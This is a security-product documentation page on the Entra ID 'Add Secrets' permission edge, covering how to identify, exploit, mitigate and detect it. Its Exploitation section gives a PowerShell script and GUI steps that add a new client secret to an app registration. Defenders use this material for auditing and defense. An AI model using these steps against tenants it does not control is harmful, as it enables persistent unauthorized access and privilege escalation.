# AZ\_ADD\_SECRET ## Summary | | | | ----------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | **FSProtect ACL Alias** | AZ\_ADD\_SECRET | | **Entra ID (Azure AD) Alias** | Add Secrets | | **Affected Object Types** | App registrations & Service Principals | | **Exploitation Certainty** | Certain | | **Graph Permission / Role** | When a principal has been granted **Cloud Application Administrator** or **Application Administrator** against the tenant, that principal gains the ability to add new secrets to all Service Principals and App Registrations. Additionally, a principal that has been granted **Cloud Application Administrator** or **Application Administrator** against, or explicit **Owner** of a Service Principal or App Registration gains the ability to add secrets to that particular object. | ## Description `AZ_ADD_SECRET` represents the ability for a principal (user, service principal, or group) to **add a new client secret / password credential** to an App Registration (application) or a Service Principal. Adding a secret gives an attacker or a controlled identity the ability to: * Exchange the application's client id + secret for tokens and act as that application, using any privileges granted to the app (delegated or application permissions). * If the application has broad application permissions, an attacker can perform tenant-wide actions or escalate further. * If the service principal represents infrastructure, cloud resources, or role-assignable services, the new secret may be used to access production systems or pivot laterally. Because secrets are persistent credentials that can be used from anywhere, the ability to add secrets is highly sensitive. ## Identification ### PowerShell ```powershell # Get role members (including transitive group members) for roles that can add secrets $roles = @('Application Administrator','Cloud Application Administrator','Global Administrator') $roleMembers = foreach ($roleName in $roles) { $role = Get-MgDirectoryRole -Filter "displayName eq '$roleName'" -ErrorAction SilentlyContinue if ($role) { Get-MgDirectoryRoleMemberAsUser -DirectoryRoleId $role.Id -ErrorAction SilentlyContinue | ForEach-Object { [pscustomobject]@{ Role = $roleName; UserDisplayName = $_.DisplayName; UserPrincipalName = $_.UserPrincipalName; UserId = $_.Id } } } } # Get all application owners $appOwners = Get-MgApplication -All | ForEach-Object { $app = $_ Get-MgApplicationOwner -ApplicationId $_.Id -ErrorAction SilentlyContinue | ForEach-Object { [pscustomobject]@{ AppDisplayName = $app.DisplayName; AppId = $app.AppId; OwnerDisplayName = $_.AdditionalProperties.displayName; OwnerId = $_.Id } } } "=== USERS WHO CAN ADD SECRETS (BY TENANT ROLES) ===" $roleMembers | Sort-Object Role,UserDisplayName | Format-Table -AutoSize "=== APPLICATION OWNERS ===" $appOwners | Sort-Object AppDisplayName,OwnerDisplayName | Format-Table -AutoSize ``` ### Azure GUI 1. **Application owners who can add client secrets** 1. Open **Microsoft Entra admin center** -> **Applications** -> **App registrations**. 2. Select the **target application** (the App Registration you want to assess). 3. In the left menu of the application blade, go to **Owners**. * Anyone listed as **Owner** can go to **Certificates & secrets** for this app and add new **client secrets**. ![Ui Owners](/files/8AmWzSajTRCjP2MSUlto) 2. **Directory roles whose members can add client secrets** 1. In **Microsoft Entra admin center**, go to **Roles & administrators**. 2. Look for the following roles: * **Global Administrator (GA)** * **Privileged Role Administrator (PRA)** * **Application Administrator** * **Cloud Application Administrator** 3. Click each role -> open **Assignments**. * Any **user** or **service principal** assigned to one of these roles can add **client secrets** to App Registrations (including the target app), even if they are not listed as Owners. * If a **group** is assigned to one of these roles, enumerate the group's **transitive members** (including nested groups) to find all effective identities that can add secrets. ![Ui Azure Role Assignments](/files/B8X1mZ4bRIlifaf05mto) ## Exploitation ### PowerShell ```powershell #Connect-MgGraph #connect to graph first $appName = "App Name here" $description = "Added secret" # Get the application by display name $app = Get-MgApplication -Filter "displayName eq '$appName'" # Create password credential parameters $passwordCredential = @{ DisplayName = $description EndDateTime = (Get-Date).AddYears(1) } # Add the secret to the application $cred = Add-MgApplicationPassword -ApplicationId $app.Id -PasswordCredential $passwordCredential Write-Host "" Write-Host "New client secret value:" $cred.SecretText Write-Host "Description:" $description Write-Host "Expires:" $cred.EndDateTime ``` ![Exploitation Powershell](/files/QiZ0reIEsKmg4jmFbb3V) ### Azure GUI * Open **Microsoft Entra admin center** -> **Applications** -> **App registrations**. * Select the **target application** you want to manage. * In the left menu of the application blade, go to **Certificates & secrets**. * Under **Client secrets**, click **+ New client secret**. * Enter a **Description** for the secret. * Choose the **Expiration** period (e.g., 3 months, 6 months, 12 months, or custom). * Click **Add**. * A new secret value will appear under **Value**. * **Copy the secret immediately** - you will not be able to see it again after leaving the page. ![Exploitation UI](/files/QIBWWzzBpSL7xy6MM23g) ## Mitigation 1. **Limit application owners who can add client secrets** 1. Open **Microsoft Entra admin center** -> **Applications** -> **App registrations**. 2. Select the **target application**. 3. In the left menu, go to **Owners**. 4. Review the list of **Owners**: * Remove any identity that **does not need to manage secrets** for this app. * To remove: select the owner -> click **Remove**. 5. Keep the owner list **as small as possible**: * Prefer a **dedicated admin group** (with tight membership) instead of many individual owners. * Avoid adding regular users or broad groups as owners. 2. **Limit directory roles whose members can add client secrets** 1. In **Microsoft Entra admin center**, go to **Roles & administrators**. 2. For each of the following roles: * **Global Administrator (GA)** * **Privileged Role Administrator (PRA)** * **Application Administrator** * **Cloud Application Administrator** 3. Click the role -> open **Assignments**. 4. Review all **users, service principals, and groups** assigned to the role: * Remove any assignment that **does not require** the ability to manage application credentials (including secrets). * To remove: select the assignment -> click **Remove assignment**. 5. If a **group** is assigned to one of these roles: * Ensure the group's membership is **strictly controlled** (only admins who truly need app-management rights). * Avoid large or generic groups (e.g., "All IT", "Developers") being assigned to these roles ## Detection **Use Entra Audit Logs to see who added a new client secret** 1. Open **Microsoft Entra admin center** -> **Identity** -> **Monitoring & health** -> **Audit logs**. 2. In the **Audit logs** view, set: * **Date** filter to the time window you want to investigate. * **Service** (if available) to **Application management** or similar. 3. Use **Add filters** -> filter by: * **Category / Activity**: look for activities such as * **"Update application - Certificates and secrets management"** * Optionally filter by **Target** (the specific application) if you know the app. 4. Open the relevant audit event(s): * Check the **Initiated by** field to see **which identity** added the secret (user, service principal, or group via app). * Check the **Target** to confirm the **App Registration / Service Principal** that received a new secret. ![image.png](/files/leGxk6T5RTv5GlxNGiBs) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.forestall.io/fsprotect/edges/azure/az_add_secret.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.